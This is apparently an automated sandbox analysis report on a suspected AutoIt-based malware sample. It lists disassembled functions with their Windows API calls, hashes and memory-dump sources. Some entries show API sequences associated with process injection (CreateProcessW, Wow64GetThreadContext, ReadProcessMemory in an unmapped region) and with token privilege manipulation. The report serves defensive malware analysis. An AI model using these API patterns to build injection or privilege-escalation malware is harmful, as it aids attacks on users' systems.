                                                              • Opcode Fuzzy Hash: 605ccfdec59096966fe8a744696a4b7ae21dacb6b9aa299429c5335e923184e5
                                                              • Instruction Fuzzy Hash: 8B11AC718083019BC700EF69EC0591AFFE8EB89754F114A2FF444832B1DBB49918CF9A
                                                              APIs
                                                                • Part of subcall function 0045571C: __FF_MSGBANNER.LIBCMT ref: 00455733
                                                                • Part of subcall function 0045571C: __NMSG_WRITE.LIBCMT ref: 0045573A
                                                                • Part of subcall function 0045571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00450DD3,?), ref: 0045575F
                                                              • std::exception::exception.LIBCMT ref: 00450DEC
                                                              • __CxxThrowException@8.LIBCMT ref: 00450E01
                                                                • Part of subcall function 0045859B: RaiseException.KERNEL32(?,?,?,004E9E78,00000000,?,?,?,?,00450E06,?,004E9E78,?,00000001), ref: 004585F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: 25feb9963e3a14634d9f4d7015d64408d50eb212bf847c5b2a1cec02549efec9
                                                              • Instruction ID: ecfaf8c87e4706eea3322483ef65268c8d2dd150ec87d6c23880ddce41bfc6c0
                                                              • Opcode Fuzzy Hash: 25feb9963e3a14634d9f4d7015d64408d50eb212bf847c5b2a1cec02549efec9
                                                              • Instruction Fuzzy Hash: 24F0863950021E76DB10BA95DD01ADF77A89F11357F10442FFD04A6283EFB99A4885DD
                                                              APIs
                                                                • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
                                                              • __lock_file.LIBCMT ref: 004553EB
                                                                • Part of subcall function 00456C11: __lock.LIBCMT ref: 00456C34
                                                              • __fclose_nolock.LIBCMT ref: 004553F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 96a5f8743d05d62217137f8e566e8cea0dca781456fa4b80b9bef22cd91f9c91
                                                              • Instruction ID: 5aa9989d60ae868be7a6d45093aadfc6ac1388cd91a830fc0d0f221cf488979d
                                                              • Opcode Fuzzy Hash: 96a5f8743d05d62217137f8e566e8cea0dca781456fa4b80b9bef22cd91f9c91
                                                              • Instruction Fuzzy Hash: 0AF068718006049AD7116F6658057BD76A06F4137BF21411FAC54A71C3CFBC55499A5A
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01F91A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F91AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F91B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction ID: 33439cc0ed492f2a0bbc537b29ad574dcdc2473c36e448a15af9f1d03f8379a5
                                                              • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                              • Instruction Fuzzy Hash: F712CE24E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A5F81CF5A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 096cf18e322431e78e5bc161ec98c76863b6984deec354c03021b97a2336aab2
                                                              • Instruction ID: 44bab56dc2ab8cde32489e4452faf6fae7bf82cfed3cad65b5601ae687a505e6
                                                              • Opcode Fuzzy Hash: 096cf18e322431e78e5bc161ec98c76863b6984deec354c03021b97a2336aab2
                                                              • Instruction Fuzzy Hash: D64116746043419FDB14DF14C444B1ABBE1BF49318F1998ADE9998B362C339EC49CF9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: 5c8a708d024fb22eb48ca4c0c94c60e70ae028987239c132e44c67ee72e87dcb
                                                              • Instruction ID: a251ee3304108ee270deb89cd4a0bb467c8e2f6a6cbda95fe23e34e239320474
                                                              • Opcode Fuzzy Hash: 5c8a708d024fb22eb48ca4c0c94c60e70ae028987239c132e44c67ee72e87dcb
                                                              • Instruction Fuzzy Hash: 3F2138B2A04A09EBDB204F16E88176ABBF4FF14354F20842FE886C9191FB3494D0D74E
                                                              APIs
                                                                • Part of subcall function 00434BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00434BEF
                                                                • Part of subcall function 0045525B: __wfsopen.LIBCMT ref: 00455266
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434E0F
                                                                • Part of subcall function 00434B6A: FreeLibrary.KERNEL32(00000000), ref: 00434BA4
                                                                • Part of subcall function 00434C70: _memmove.LIBCMT ref: 00434CBA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                              • String ID:
                                                              • API String ID: 1396898556-0
                                                              • Opcode ID: ee97270d916703584553fac3a6a102a129159e569530dd39ac66472f2868b615
                                                              • Instruction ID: 98485b204286a82f0b34afb347739cc86cf1013d0ff022642f5ab36dea098e6c
                                                              • Opcode Fuzzy Hash: ee97270d916703584553fac3a6a102a129159e569530dd39ac66472f2868b615
                                                              • Instruction Fuzzy Hash: 6811C831A00205ABCF14BF71CC17FED77A4AF88714F10842FF54197281DA79A9059759
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 949aeb5475f72224eb7f90707cd025c7450cd244ecc7c10c41a6b1a073a512f5
                                                              • Instruction ID: 439085dc1f81f91865e89fa979136bfc39d9dea6fb8828d7de2aa91255d95a6c
                                                              • Opcode Fuzzy Hash: 949aeb5475f72224eb7f90707cd025c7450cd244ecc7c10c41a6b1a073a512f5
                                                              • Instruction Fuzzy Hash: AF2122B4508301DFCB14DF24C444A1ABBE1BF88315F05896EE88A97722D739E819CB9B
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 004548A6
                                                                • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: b9695d503ee7f994f795ffc7e080404e98721d5803fd581efff59a5272cc581d
                                                              • Instruction ID: 024d3bde10a8b930e4f3cc99fa0fa9a73826851c0073298ee905ef2063242ec2
                                                              • Opcode Fuzzy Hash: b9695d503ee7f994f795ffc7e080404e98721d5803fd581efff59a5272cc581d
                                                              • Instruction Fuzzy Hash: 6DF0D171800604ABDB11BFA288063AE36A0AF4032FF11440EBC14AA193CB7C8999DF49
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 2dd93781c175439e7f79cc2af7e1652528eb96ade003da7a7019c752bfbae299
                                                              • Instruction ID: 5861b3b357ca51e8153b86b3d2f40e1ba728384ce97880f3152040741e909bf5
                                                              • Opcode Fuzzy Hash: 2dd93781c175439e7f79cc2af7e1652528eb96ade003da7a7019c752bfbae299
                                                              • Instruction Fuzzy Hash: 71F03071501711CFDB349F64D495853BBE1BF983297109A7FE5DA82610C739A844DF48
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004507B0
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_memmove
                                                              • String ID:
                                                              • API String ID: 2514874351-0
                                                              • Opcode ID: d05d2489b6ffe775fd90b2930d0f751ae442d4cc97b326ec77c5e4199fd6f31f
                                                              • Instruction ID: fc88bcc2f343ae0f4136759ccf33e2f12a023531e6e99fe3a81a7dbb457308fc
                                                              • Opcode Fuzzy Hash: d05d2489b6ffe775fd90b2930d0f751ae442d4cc97b326ec77c5e4199fd6f31f
                                                              • Instruction Fuzzy Hash: 33E0867690422857C72096699C05FEAB7EDDB887A4F0441B6FC0CD7214D965AC848695
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wfsopen
                                                              • String ID:
                                                              • API String ID: 197181222-0
                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction ID: 5b0f97acc59a2e1cfeb8636f9b37e92f260b146d966c67c387968ab59869202a
                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction Fuzzy Hash: 94B0927644020C77CE012A82EC02A593B199B41768F408061FF0C18162A677A6689A8A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: 7c7e074f336a42937a3dce3798dbc48e0badafa73efdac3245a950124125098c
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: C431E878A001059BC71EDF08C48496AF7A5FB4A302B688796E80ACF356D735EDC5DBC5
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 01F922B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2137747443.0000000001F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1f90000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: 05a9891fdb1a27df5724734d9145622495356e75268a8ddf3d4641ee111bbf88
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 49E0E67494010EEFDB00EFB8D54969E7FB4EF04301F1001A1FD01D2281D6319D508A72
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004BCB37
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004BCB95
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BCBD6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004BCC00
                                                              • SendMessageW.USER32 ref: 004BCC29
                                                              • _wcsncpy.LIBCMT ref: 004BCC95
                                                              • GetKeyState.USER32(00000011), ref: 004BCCB6
                                                              • GetKeyState.USER32(00000009), ref: 004BCCC3
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004BCCD9
                                                              • GetKeyState.USER32(00000010), ref: 004BCCE3
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004BCD0C
                                                              • SendMessageW.USER32 ref: 004BCD33
                                                              • SendMessageW.USER32(?,00001030,?,004BB348), ref: 004BCE37
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004BCE4D
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004BCE60
                                                              • SetCapture.USER32(?), ref: 004BCE69
                                                              • ClientToScreen.USER32(?,?), ref: 004BCECE
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004BCEDB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004BCEF5
                                                              • ReleaseCapture.USER32 ref: 004BCF00
                                                              • GetCursorPos.USER32(?), ref: 004BCF3A
                                                              • ScreenToClient.USER32(?,?), ref: 004BCF47
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 004BCFA3
                                                              • SendMessageW.USER32 ref: 004BCFD1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004BD00E
                                                              • SendMessageW.USER32 ref: 004BD03D
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004BD05E
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004BD06D
                                                              • GetCursorPos.USER32(?), ref: 004BD08D
                                                              • ScreenToClient.USER32(?,?), ref: 004BD09A
                                                              • GetParent.USER32(?), ref: 004BD0BA
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 004BD123
                                                              • SendMessageW.USER32 ref: 004BD154
                                                              • ClientToScreen.USER32(?,?), ref: 004BD1B2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004BD1E2
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004BD20C
                                                              • SendMessageW.USER32 ref: 004BD22F
                                                              • ClientToScreen.USER32(?,?), ref: 004BD281
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004BD2B5
                                                                • Part of subcall function 004325DB: GetWindowLongW.USER32(?,000000EB), ref: 004325EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BD351
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F$pbO
                                                              • API String ID: 3977979337-3825772488
                                                              • Opcode ID: c55fe5d49ce17c041ded3c31b610377931e21fbfcd58c5b5d0739d8f6d2d5c1d
                                                              • Instruction ID: da00c101abf043f5c2e046148e0e216c354b2f2c7855d5e79985c903352dfd4f
                                                              • Opcode Fuzzy Hash: c55fe5d49ce17c041ded3c31b610377931e21fbfcd58c5b5d0739d8f6d2d5c1d
                                                              • Instruction Fuzzy Hash: 2242C034508640AFDB24DF28D8C4AAABFE5FF48310F14062EF6558B2B1C735E855DB6A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_memset
                                                              • String ID: ]N$3cD$DEFINE$P\N$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_D
                                                              • API String ID: 1357608183-451301767
                                                              • Opcode ID: d53df95eecd5dc4d84c85546f1de09a013819b5b66be6a7f83fa02a21fd92729
                                                              • Instruction ID: 0fd2dfe8a7d96896929e2d148bb67472aeb693eb3d259d1a8d8c72c36c3767ae
                                                              • Opcode Fuzzy Hash: d53df95eecd5dc4d84c85546f1de09a013819b5b66be6a7f83fa02a21fd92729
                                                              • Instruction Fuzzy Hash: 5B93B471E00215DBDB24DF58C881BAEB7B1FF48710F24856BE945AB391E7789D82CB48
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 004348DF
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0046D665
                                                              • IsIconic.USER32(?), ref: 0046D66E
                                                              • ShowWindow.USER32(?,00000009), ref: 0046D67B
                                                              • SetForegroundWindow.USER32(?), ref: 0046D685
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046D69B
                                                              • GetCurrentThreadId.KERNEL32 ref: 0046D6A2
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046D6AE
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0046D6BF
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0046D6C7
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0046D6CF
                                                              • SetForegroundWindow.USER32(?), ref: 0046D6D2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D6E7
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D6F2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D6FC
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D701
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D70A
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D70F
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0046D719
                                                              • keybd_event.USER32(00000012,00000000), ref: 0046D71E
                                                              • SetForegroundWindow.USER32(?), ref: 0046D721
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0046D748
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: b2054204fe0c43783bb53502750eec85b9c5e7030c88b0394cf9e90aeea6e103
                                                              • Instruction ID: 3c3cdd204e17c654ccfdc0d646e0de93bad34e0c3e5f5e7c651125686986c36d
                                                              • Opcode Fuzzy Hash: b2054204fe0c43783bb53502750eec85b9c5e7030c88b0394cf9e90aeea6e103
                                                              • Instruction Fuzzy Hash: 86318671E403187BEB201F659C49FBF3F6CEB44B51F104136FA08EA1D1DA745D01AAAA
                                                              APIs
                                                                • Part of subcall function 004887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0048882B
                                                                • Part of subcall function 004887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00488858
                                                                • Part of subcall function 004887E1: GetLastError.KERNEL32 ref: 00488865
                                                              • _memset.LIBCMT ref: 00488353
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004883A5
